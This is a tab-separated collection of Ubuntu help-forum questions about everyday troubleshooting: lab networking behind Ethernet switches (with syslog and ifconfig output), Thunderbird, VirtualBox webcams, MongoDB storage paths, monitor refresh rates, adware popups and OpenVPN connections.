257690	lose internet when connected to trendnet ethernet switch	i just installed ubuntu 12.10 on about 30 computers at a high school computer lab ( and deleted win xp and win 7 ) . the problem that i have now is that we are unable to access the internet over our network . the school has an adsl router and a single ethernet cable that comes to the computer lab . this cable connects to a 24 port trendnet ethernet switch . half of the computers are connected to this switch . another ethernet cable goes from this switch to an identical switch across the lab giving internet access to the other half of the computers . i did not set up the network this way , but it used to work when the computers had windows loaded on them . after installing ubuntu we no longer have internet connectivity over the network . when i connect the ethernet cable from the adsl router directly to one of the computers the internet works properly , but when i connect it to the switch we get nothing . ubuntu does not even assign local ip addresses to the computer when set to automatic dhcp . i tried setting manual ip addresses outside the dhcp range : i set the ip address to 192.168.1.101 through 192.168.1.130 . i set the gateway to 192.168.1.1 , the subnet mask to 255.255.255.0 and the dns router to 192.168.1.1 . i later switched the dns router to opendns 's ip addresses . setting the ip addresses manually did allow me to ping computers on the local network as long as the were on the same switch . it would time out if the computer were on the other switch or if they were outside the local network and still no internet access . i also tried restarting the router and the switches with no luck . does anyone have any suggestions about how to access the internet over our local network and how to network the computers across both switches ? edit : here is what the syslog gives me : computer8 dbus [ 835 ] : [ system ] successfully activated service 'org.freedesktop.policykit1' feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : init ! feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : update_system_hostname feb 19 16:18:59 computer8 networkmanager [ 902 ] : scpluginifupdown : management mode : unmanaged feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:05.0/0000:02:00.0/net/eth0 , iface : eth0 ) feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:05.0/0000:02:00.0/net/eth0 , iface : eth0 ) : no ifupdown configuration found . feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/lo , iface : lo ) feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/lo , iface : lo ) : no ifupdown configuration found . feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : end _init . feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > loaded plugin ifupdown : ( c ) 2008 canonical ltd. to report bugs please use the networkmanager mailing list . feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > loaded plugin keyfile : ( c ) 2007 - 2010 red hat , inc. to report bugs please use the networkmanager mailing list . feb 19 16:18:59 computer8 networkmanager [ 902 ] : ifupdown : get unmanaged devices count : 0 feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : ( -1240455032 ) ... get_connections . feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : ( -1240455032 ) ... get_connections ( managed=false ) : return empty list . feb 19 16:18:59 computer8 networkmanager [ 902 ] : keyfile : parsing wired connection 1 ... feb 19 16:18:59 computer8 networkmanager [ 902 ] : keyfile : read connection 'wired connection 1' feb 19 16:18:59 computer8 networkmanager [ 902 ] : ifupdown : get unmanaged devices count : 0 feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > modem-manager is now available feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > monitoring kernel firmware directory '/lib/firmware ' . feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > wifi enabled by radio killswitch ; enabled by state file feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > wwan enabled by radio killswitch ; enabled by state file feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > wimax enabled by radio killswitch ; enabled by state file feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > networking is enabled by state file feb 19 16:18:59 computer8 networkmanager [ 902 ] : < warn > failed to allocate link cache : ( -10 ) operation not supported feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : carrier is off feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : new ethernet device ( driver : 'r8169 ' ifindex : 2 ) feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : exported as /org/freedesktop/networkmanager/devices/0 feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : now managed feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : bringing up device . feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : preparing device . feb 19 16:18:59 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : deactivating device ( reason 'managed ' ) [ 2 ] feb 19 16:18:59 computer8 networkmanager [ 902 ] : < warn > /sys/devices/virtual/net/lo : could n't determine device driver ; ignoring ... feb 19 16:18:59 computer8 networkmanager [ 902 ] : < warn > /sys/devices/virtual/net/lo : could n't determine device driver ; ignoring ... feb 19 16:18:59 computer8 kernel : [ 15.621206 ] r8169 0000:02:00.0 : > eth0 : link down feb 19 16:18:59 computer8 kernel : [ 15.621396 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready feb 19 16:18:59 computer8 kernel : [ 15.621674 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : network interface enumeration completed . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : registering hinfo record with values 'i686'/'linux ' . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : server startup complete . host name is computer8.local . local service cookie is 2464504904 . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : service `` computer8 '' ( /services/udisks.service ) successfully established . feb 19 16:18:59 computer8 anacron [ 996 ] : anacron 2.3 started on 2013-02-19 feb 19 16:18:59 computer8 acpid : starting up with proc fs feb 19 16:18:59 computer8 cron [ 966 ] : ( cron ) info ( pidfile fd = 3 ) feb 19 16:18:59 computer8 kernel : [ 15.777742 ] bridge firewalling registered feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : joining mdns multicast group on interface lxcbr0.ipv4 with address 10.0.3.1 . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : new relevant interface lxcbr0.ipv4 for mdns . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : registering new address record for 10.0.3.1 on lxcbr0.ipv4 . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : withdrawing address record for 10.0.3.1 on lxcbr0 . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : leaving mdns multicast group on interface lxcbr0.ipv4 with address 10.0.3.1 . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : interface lxcbr0.ipv4 no longer relevant for mdns . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : joining mdns multicast group on interface lxcbr0.ipv4 with address 10.0.3.1 . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : new relevant interface lxcbr0.ipv4 for mdns . feb 19 16:18:59 computer8 avahi-daemon [ 905 ] : registering new address record for 10.0.3.1 on lxcbr0.ipv4 . feb 19 16:18:59 computer8 networkmanager [ 902 ] : < warn > /sys/devices/virtual/net/lxcbr0 : could n't determine device driver ; ignoring ... feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/lxcbr0 , iface : lxcbr0 ) feb 19 16:18:59 computer8 networkmanager [ 902 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/lxcbr0 , iface : lxcbr0 ) : no ifupdown configuration found . feb 19 16:19:00 computer8 cron [ 1048 ] : ( cron ) startup ( fork ok ) feb 19 16:19:00 computer8 cron [ 1048 ] : ( cron ) info ( running @ reboot jobs ) feb 19 16:19:00 computer8 ntpdate [ 1051 ] : ca n't find host ntp.ubuntu.com : name or service not known ( -2 ) feb 19 16:19:00 computer8 ntpdate [ 1051 ] : no servers can be used , exiting feb 19 16:19:00 computer8 kernel : [ 15.855197 ] ip_tables : ( c ) 2000-2006 netfilter core team feb 19 16:19:00 computer8 kernel : [ 15.865021 ] nf_conntrack version 0.5.0 ( 11983 buckets , 47932 max ) feb 19 16:19:00 computer8 dnsmasq [ 1073 ] : started , version 2.63rc6 cachesize 150 feb 19 16:19:00 computer8 dnsmasq [ 1073 ] : compile time options : ipv6 gnu-getopt dbus i18n idn dhcp dhcpv6 no-lua tftp conntrack feb 19 16:19:00 computer8 dnsmasq-dhcp [ 1073 ] : dhcp , ip range 10.0.3.2 -- 10.0.3.254 , lease time 1h feb 19 16:19:00 computer8 dnsmasq [ 1073 ] : no servers found in /etc/resolv.conf , will retry feb 19 16:19:00 computer8 dnsmasq [ 1073 ] : read /etc/hosts - 7 addresses feb 19 16:19:00 computer8 anacron [ 996 ] : will run job `cron.daily ' in 5 min . feb 19 16:19:00 computer8 anacron [ 996 ] : jobs will be executed sequentially feb 19 16:19:00 computer8 dbus [ 835 ] : [ system ] activating service name='org.freedesktop.accounts ' ( using servicehelper ) feb 19 16:19:00 computer8 accounts-daemon [ 1094 ] : started daemon version 0.6.21 feb 19 16:19:00 computer8 dbus [ 835 ] : [ system ] successfully activated service 'org.freedesktop.accounts' feb 19 16:19:00 computer8 dbus [ 835 ] : [ system ] activating service name='org.freedesktop.consolekit ' ( using servicehelper ) feb 19 16:19:00 computer8 dbus [ 835 ] : [ system ] successfully activated service 'org.freedesktop.consolekit' feb 19 16:19:01 computer8 kernel : [ 17.130284 ] r8169 0000:02:00.0 : > eth0 : link up feb 19 16:19:01 computer8 kernel : [ 17.130497 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : carrier now on ( device state 20 ) feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : device state change : unavailable - > disconnected ( reason 'carrier-changed ' ) [ 20 30 40 ] feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > auto-activating connection 'wired connection 1 ' . feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) starting connection 'wired connection 1' feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) beginning ip6 addrconf . feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . feb 19 16:19:01 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... feb 19 16:19:01 computer8 avahi-daemon [ 905 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.168.1.108 . feb 19 16:19:01 computer8 avahi-daemon [ 905 ] : new relevant interface eth0.ipv4 for mdns . feb 19 16:19:01 computer8 avahi-daemon [ 905 ] : registering new address record for 192.168.1.108 on eth0.ipv4 . feb 19 16:19:01 computer8 acpid : 33 rules loaded feb 19 16:19:01 computer8 acpid : waiting for events : event logging is off feb 19 16:19:01 computer8 acpid : client connected from 1067 [ 0:0 ] feb 19 16:19:01 computer8 acpid : 1 client rule loaded feb 19 16:19:01 computer8 avahi-daemon [ 905 ] : joining mdns multicast group on interface lxcbr0.ipv6 with address fe80 : :ac67:41ff : fe66 : c671 . feb 19 16:19:01 computer8 avahi-daemon [ 905 ] : new relevant interface lxcbr0.ipv6 for mdns . feb 19 16:19:01 computer8 avahi-daemon [ 905 ] : registering new address record for fe80 : :ac67:41ff : fe66 : c671 on lxcbr0.* . feb 19 16:19:01 computer8 dbus [ 835 ] : [ system ] activating service name='org.freedesktop.upower ' ( using servicehelper ) feb 19 16:19:01 computer8 dbus [ 835 ] : [ system ] successfully activated service 'org.freedesktop.upower' feb 19 16:19:02 computer8 avahi-daemon [ 905 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :224:21ff : fea0 : cfd0 . feb 19 16:19:02 computer8 avahi-daemon [ 905 ] : new relevant interface eth0.ipv6 for mdns . feb 19 16:19:02 computer8 avahi-daemon [ 905 ] : registering new address record for fe80 : :224:21ff : fea0 : cfd0 on eth0.* . feb 19 16:19:02 computer8 kernel : [ 17.856246 ] ipv6 : eth0 : ipv6 duplicate address fe80 : :224:21ff : fea0 : cfd0 detected ! feb 19 16:19:02 computer8 networkmanager [ 902 ] : < info > ( eth0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] feb 19 16:19:02 computer8 networkmanager [ 902 ] : < info > dns : starting dnsmasq ... feb 19 16:19:02 computer8 networkmanager [ 902 ] : < error > [ 1361251142.663612 ] [ nm-dns-dnsmasq.c:390 ] update ( ) : dnsmasq not available on the bus , ca n't update servers . feb 19 16:19:02 computer8 networkmanager [ 902 ] : < error > [ 1361251142.663656 ] [ nm-dns-dnsmasq.c:392 ] update ( ) : dnsmasq owner not found on bus : could not get owner of name 'org.freedesktop.networkmanager.dnsmasq ' : no such name feb 19 16:19:02 computer8 networkmanager [ 902 ] : < warn > dns : plugin dnsmasq update failed feb 19 16:19:02 computer8 networkmanager [ 902 ] : < info > ( ( null ) ) : writing resolv.conf to /sbin/resolvconf feb 19 16:19:02 computer8 networkmanager [ 902 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . feb 19 16:19:02 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) successful , device activated . feb 19 16:19:02 computer8 networkmanager [ 902 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . feb 19 16:19:02 computer8 dbus [ 835 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) feb 19 16:19:02 computer8 dbus [ 835 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' feb 19 16:19:02 computer8 networkmanager [ 902 ] : < warn > dnsmasq appeared on dbus : :1.22 feb 19 16:19:02 computer8 dnsmasq [ 1506 ] : started , version 2.63rc6 cache disabled feb 19 16:19:02 computer8 dnsmasq [ 1506 ] : compile time options : ipv6 gnu-getopt dbus i18n idn dhcp dhcpv6 no-lua tftp conntrack feb 19 16:19:02 computer8 dnsmasq [ 1506 ] : dbus support enabled : connected to system bus feb 19 16:19:02 computer8 dnsmasq [ 1506 ] : warning : no upstream servers configured feb 19 16:19:02 computer8 networkmanager [ 902 ] : < info > ( ( null ) ) : writing resolv.conf to /sbin/resolvconf feb 19 16:19:02 computer8 dnsmasq [ 1506 ] : setting upstream servers from dbus feb 19 16:19:02 computer8 dnsmasq [ 1506 ] : using nameserver 208.67.220.220 # 53 feb 19 16:19:02 computer8 dnsmasq [ 1506 ] : using nameserver 208.67.222.222 # 53 this is what ifconfig gives me eth0 link encap : ethernet hwaddr 00:24:21 : a0 : cf : d0 inet addr:192.168.1.108 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :224:21ff : fea0 : cfd0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1039910 errors:0 dropped:0 overruns:0 frame:0 tx packets:199 errors:0 dropped:47 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:68572248 ( 68.5 mb ) tx bytes:16079 ( 16.0 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:176 errors:0 dropped:0 overruns:0 frame:0 tx packets:176 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:13122 ( 13.1 kb ) tx bytes:13122 ( 13.1 kb ) lxcbr0 link encap : ethernet hwaddr ae:67:41:66 : c6:71 inet addr:10.0.3.1 bcast:10.0.3.255 mask:255.255.255.0 inet6 addr : fe80 : :ac67:41ff : fe66 : c671/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:40 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:7989 ( 7.9 kb )
257692	no blue envelope when using filters on thunderbird	i 'm having the following issue with thunderbird 17.0.2 under ubuntu 12.04 lts ( fresh install and full updated ) : when i receive a new e-mail on any inbox ( no filters ) everything is nice , sounds a notification , a notification appears on system tray and the envelope turns blue but when i receive a new e-mail into a filtered folder the envelope does n't turn blue ( sound and visual notifications keep working fine ) i addition : i have messaging menu and unity launcher integration installed . i 've checked `` showing in the messaging menu -- > for messages in all folders '' option .
257693	no prompt for the terminal	i removed some software from the ubuntu software center because i did not want unnecessary sofwares to be present in my ssytem . but unfortunately i might have tickled the the terminal . i don , t see the prompt in my terminal.please help .
257696	virtual machine windows 7 usb webcam connection lost when switching back to ubuntu	i am relatively new to ubuntu , willing to learn , but do n't have a ton of experience with command line interfaces ( so go easy on me please if possible tech-wise ! ) ... i have xubuntu installed on my home computer , and recently installed vmware virtualbox , with which i created a virtual machine running windows 7 , so i could run postureminder software ( which accesses my usb webcam ) . the software works fine when my 'focus ' is on the virtualbox ( i.e . the mouse/keyboard is inside the virtual machine ) ( i joined the vboxuser system group in ubuntu to enable this ) , but when i switch back to xubuntu the postureminder software does not registered me as being at the computer for the period i have worked in xubuntu . the only indication of a problem is that the software says 'welcome back ' and has no record of my being at the computer for the period i work in xubuntu . whether this is because the usb connection has been lost , or for some other reason i am not sure ... i assume the virtual machine can run 'in the background ' whilst i go back to working in ubuntu , so am guessing that it is something to do with the usb connection , hence me posting here , but realise it may be a vmware or postureminder issue . thanks in advance for any help - much appreciated . ron
257700	how to write a .iso file to an sd card ?	unetbootin does not recognize my sd card . is there any alternative software to write a .iso file to an sd card ? i 'm not trying to write a ubuntu .iso , so startup disk creator wont work..
257704	problem with ubuntu phone sdk demo app	i have installed the ubuntu phone sdk on a virtualbox vm running ubuntu precise ( 12.04.2 lts ) as the guest os . the `` guest extensions '' have been installed . the guest os kernel is 32 bit 3.2.0-37 without pae . i followed the installation instructions for the sdk on http : //developer.ubuntu.com , and the installation seemed to go smoothly . however , when i attempt to run the demo `` currency converter '' app , qmlscene reports many errors with the form : opengl warning : xgetvisualinfo returned 0 visuals for 0x8db7f98 ultimately followed by the message : unrecognized opengl version a black box pops up , but nothing is drawn within it . does anyone know what might be causing this problem ?
257706	how to install xencenter on ubuntu 12.10	i want to install xencenter on ubuntu 12.10 . i 've tried a lot of solutions , even wine , but no luck this far . how do i install xenceter on ubuntu 12.10 ?
257714	how to change the location that mongodb uses to store its data ?	i edited the mongodb config file to store it 's data in /home/user/data/mongod . but data is still written to the old directory , supposedly because the permissions to the new folder are not granted - how can i give mongodb the necessary permissions for that directory ?
257716	popup malware âopenadserving.comâ	can someone help me please ? ! when i 'm using chrome ( or fire fox ) i 'm getting fullscreen popup advertising even on sites that i am certain do not have it . i see the web site it is trying to load is `` www.openadserving.com '' in the status bar . so i looked on this forum and i saw a same problem.. so i tried to fix it my self true terminal.. but it does n't work.. this was an answer from sadi.. ( chrome popup malware `` openadserving.com '' ? ) you have n't provided sufficient information to identify the problem accurately , but the following suggestions may help to identify or even hopefully solve it : you can open your hosts file ( enter this command in terminal : sudo gedit /etc/hosts ) and enter this line at the bottom : 127.0.0.1 www.openadserving.com as this will prevent all connection between this site and your computer after restart , this might solve your problem or if it does n't , then ; you can try a program like net activity viewer to see a list of sites your browser is being connected , and add all undesirable addresses there as in the step 1 . you can try using a utility like hostsblock to prevent connection to such sites in general . ( this utility can be downloaded and manually installed from archlinux repositories with just one minor modification , replacing pathname /etc/rc.d with /etc/init.d in these files : hostsblock.sh , hostsblock-urlcheck.sh and rc.conf ) i did the first step but it does n't work ... i get this in my screen macbook-pro-van-anna : ~ atoma92 $ sudo gedit /etc/hosts password : sudo : gedit : command not found please help me : (
257725	how to make ubuntu work faster on vmware player ?	i have installed ubuntu 12.10 desktop on vmware player with windows 7 as an host . i have given it 30gb or hard disk space and 3 gb of ram yet ubuntu is lagging . when i right click or something , it takes around 3-4 seconds to show the menu.. ca n't it work faster ? any ways ? i had tried installing ubuntu with dual boot with windows using a bootable usb ( made using the link given on ubuntu 's official site ) but some error occured and it was n't able to install . even windows was not booting and i had to repair it that is why i am running it on vmware . please help me make it work faster.. i hate lag : ( thanks . -ryder
257727	tripleboot windows7 and ubuntu and linux mint	so ... i have ubuntu 12.10 w/ windows 7 as dualbooted using grub . not using wubi . now ! i wan na install linux mint . ( 14 ) how do i triple boot it ? this is answeared but the button broke so i cant say that the answear is good . fail
257728	force refresh rate	i want to make my monitor work at 59hz in 1920x1080 resolution because it flickers a bit at 60hz . granted it is not in default options , so i need to forced it somehow . it was easy to do in windows , but in ubuntu i just ca n't do it , any option i try , like xrandr , just bounces of , because 1920x1080 @ 59 is not supported by default . is their some way to make it happen ? my card is nvidia 9600gt with 310.32 drivers . using xrandr is give me this output : error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 153 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 31 current serial number in output stream : 32 using xrandr -r 59 gives : rate 59.0 hz not available for this size i manage to change it to 1920x1080 @ 59 , but monitor rejected timing , so no luck for me . i wonder why it lets to work windows at 59hz ? if someone else will find this topic , i changed refresh rate by adding option `` exactmodetimingsdvi '' `` true '' before modeline command , so it looks like this : section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' option `` exactmodetimingsdvi '' `` true '' modeline `` 1680x1050_60.00 '' 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync endsection
257732	policykit-desktop-privilege - rules not in effect	my xubuntu installation asks me for my password everytime i try to mount/umount/update software ... all the things that policykit-desktop-privilege should grant me . the user is in both admin and sudo group and i think the necessary packages are installed : i a policykit-1 - framework for managing administrative poli i a policykit-1-gnome - gnome-authentifizierungsagent f端r policyki i policykit-desktop-privileges - run common desktop actions without passwor i a libpolkit-agent-1-0 - authentifizierungsagent-api f端r policykit i a libpolkit-backend-1-0 - policykit backend api i a libpolkit-gobject-1-0 - policykit authorization api i a libpolkit-qt-1-1 - policykit-qt-1 library has anyone tips on this ?
257734	problem with jdb debugger	i am trying to use ubuntu 12.04 lts on a system76 box . when i try to run the java debugger , jdb , i get a timeout after i attempt to run the application . i have tried several things and i think the problem has to do with the /etc/hosts file . my call to jdb is very simple : jdb main.runsim where my main class resides i have also tried calls that attempt to attach to an existing vm and get the same results the /etc/hosts file is : 127.0.0.1 localhost 127.0.1.1 my machine name a bunch of lines for ipv6 capable hosts including : :1 ip6-localhost ip6-loopback any idea ?
257742	can i run the ubuntu sdk in windows ?	from where can i download ubuntu sdk for mobile application development ? i can not find any links .
257743	can not detect spotify lens	today i installed spotify on ubuntu 12.04 . the program seems to work quite well for now , so i tried to install spotify-lens . the installation went ok , but the lens does n't appear in the dash . i tried to use the tool `` lenstoggle '' ( which is my lens manager by now ) , but spotify-lens did n't appear on the list . so i rebboted the whole system , but it had no effect . any idea on how to fix it ? thank you !
257746	ftp in ubuntu 12.04 lts to apache2 to edit the webpage	hello ive seen how to do this on ubuntu 10.10 and it did not work for me . so what im trying to accomplish is changing where the .html files go and how to get apache2 to read them , and have access to them with ftp.answer asap if you can .
257750	how to switch between windows 8 and ubuntu ?	i have been using windows 8 pro previously then i installed ubuntu with the windows installer . the installation was successful but when i start my computer it does n't ask me which os to boot and it boots ubuntu as default os . i have things to do in both os 's so i need to switch between them . how do i do that ?
257752	does ubuntu phone sdk support 12.04 ?	i 'm excited about ubuntu phone supporting qml , and i 'm wondering if the sdk supports 12.04 ?
257758	startup application in selected terminal	i am running on ubuntu 12.04 and would like to run an application on startup , in a maximized terminal , selected . i solved all problems exept the last one . so for now i have gnome-terminal -- maximize -x /home/user/myapp which runs the application in a maximized terminal , but it is never selected that inputs are possible . the system should work without keyboard and mouse ( only barcode scanner )
257771	factory restore ?	i just got a brand new asus x201e with ubuntu pre-installed . as i was doing the initial set-up , i was picking out the keyboard layout , trying to figure out which one of the spanish keyboard layouts was the one i 'm used to . all of a sudden it brought up an error message and did n't let me create an account or finish any steps beyond that . instead it shuffled me along to the main login screen where i had to login with a guest account . what do i need to do to finish the initial set-up steps ? is there a way to just do a factory restore ?
257777	ubuntu 11.10 and external monitor not recognized	i have a laptop and it 's being a nightmare to properly set up an external monitor i use . i had ubuntu 11.10 installed through wubi and it worked as i wanted , i started the laptop with the lid closed and the image automatically went to the monitor . later i decided to format my pc and used the opportunity to properly install ubuntu on a separate partition , as i might need more than the 30gb that wubi imposes . after this ubuntu can no longer recognize the plugged monitor ( does n't even show up on the display settings ) and the laptop monitor is shown as 'unknown ' . i tried installing the nvidia recommended drivers and tried to use the nvidia tool to set up the monitors . i was able to put the image only on the external monitor , but when i unplug it i get no image at all on my laptop . after this i tried a lot of uninstalling and reinstalling ubuntu with no success , though the funny thing is that i found out that if i start ubuntu in a bootable pen ( that 'try ubuntu ' option ) it works fine , it detects the displays properly . between this and all the os reinstalls i managed to render my windows7 unbootable and though i now have fixed that , right now i do n't have ubuntu installed and i 'm hopping that if i install wubi again i might solve this problem , though i would like to know if there is something i could try if i actually reinstall it again or if i better just install wubi and use some workaround to increase it 's space . it seems like a joke that such a simple task as plugging a screen can give so many problems to solve . thanks for any help you can provide .
257785	openvpn fails from network manager , seems to connect from terminal , but no traffic to or from target network	i 'm new to ubuntu ( as in , last week ! ) and really liking the system , but am having a real problem getting the openvpn connection to work . my system : dell xps l702x , 8gb ram , tested with both wifi and wired connection . ubuntu 12.10 , updates current . openvpn + the gnome-openvpn network manager added . i have a pre-existing configuration and associated certificates + keys from my win7 install , which i have copied first to /home/documents and then ( after a bit of reading around ) to /etc/openvpn ( using sudo ) . that configuration and key set has been working successfully for several years on windows with openvpn 2.2.x . ( latterly 2.2.2 ) . trying network manager first , i created a vpn connection of type openvpn , using certificates ( tls ) mode and specified the server certificate , my certificate , my key , the static key and set to use tap , etc. , ( to match the server config ) , and set route only for the resources on that network . i exported the configuration to compare to my original one and the settings seem to match exactly ( although it adds `` user openvpn '' and `` group openvpn '' ) . trying to start the vpn from network manager i see the padlock `` blink '' about 4 times then get a `` failed '' pop-up message . running the conf from the terminal using either : sudo openvpn -- config /etc/openvpn/cope.conf or sudo /etc/init.d/openvpn start cope i get the following output , which looks remarkably like the connection log from my win7 install : mon feb 18 14:09:56 2013 openvpn 2.2.1 x86_64-linux-gnu [ ssl ] [ lzo2 ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ pf_inet6 ] [ ipv6 payload 20110424-2 ( 2.2rc2 ) ] built on oct 8 2012 mon feb 18 14:09:56 2013 warning : no server certificate verification method has been enabled . see http : //openvpn.net/howto.html # mitm for more info . mon feb 18 14:09:56 2013 note : the current -- script-security setting may allow this configuration to call user-defined scripts mon feb 18 14:09:56 2013 control channel authentication : using '/etc/openvpn/hmacf-w.key ' as a openvpn static key file mon feb 18 14:09:56 2013 outgoing control channel authentication : using 160 bit message hash 'sha1 ' for hmac authentication mon feb 18 14:09:56 2013 incoming control channel authentication : using 160 bit message hash 'sha1 ' for hmac authentication mon feb 18 14:09:56 2013 lzo compression initialized mon feb 18 14:09:56 2013 control channel mtu parms [ l:1574 d:166 ef:66 eb:0 et:0 el:0 ] mon feb 18 14:09:56 2013 socket buffers : r= [ 212992- > 131072 ] s= [ 212992- > 131072 ] mon feb 18 14:09:56 2013 data channel mtu parms [ l:1574 d:1450 ef:42 eb:135 et:32 el:0 af:3/1 ] mon feb 18 14:09:56 2013 local options hash ( ver=v4 ) : '13a273ba' mon feb 18 14:09:56 2013 expected remote options hash ( ver=v4 ) : '360696c5' mon feb 18 14:09:56 2013 udpv4 link local : [ undef ] mon feb 18 14:09:56 2013 udpv4 link remote : [ af_inet ] xxx.xxx.xxx.xxx:8991 mon feb 18 14:09:56 2013 tls : initial packet from [ af_inet ] xxx.xxx.xxx.xxx:8991 , sid=c1da4711 85037ca7 mon feb 18 14:09:56 2013 verify ok : depth=1 , /c=uk/st=nottinghamshire/l=nottingham/o=cope/cn=cope-ca/emailaddress=security @ .com mon feb 18 14:09:56 2013 verify ok : depth=0 , /c=uk/st=nottinghamshire/o=cope/cn=server/emailaddress=security @ .com 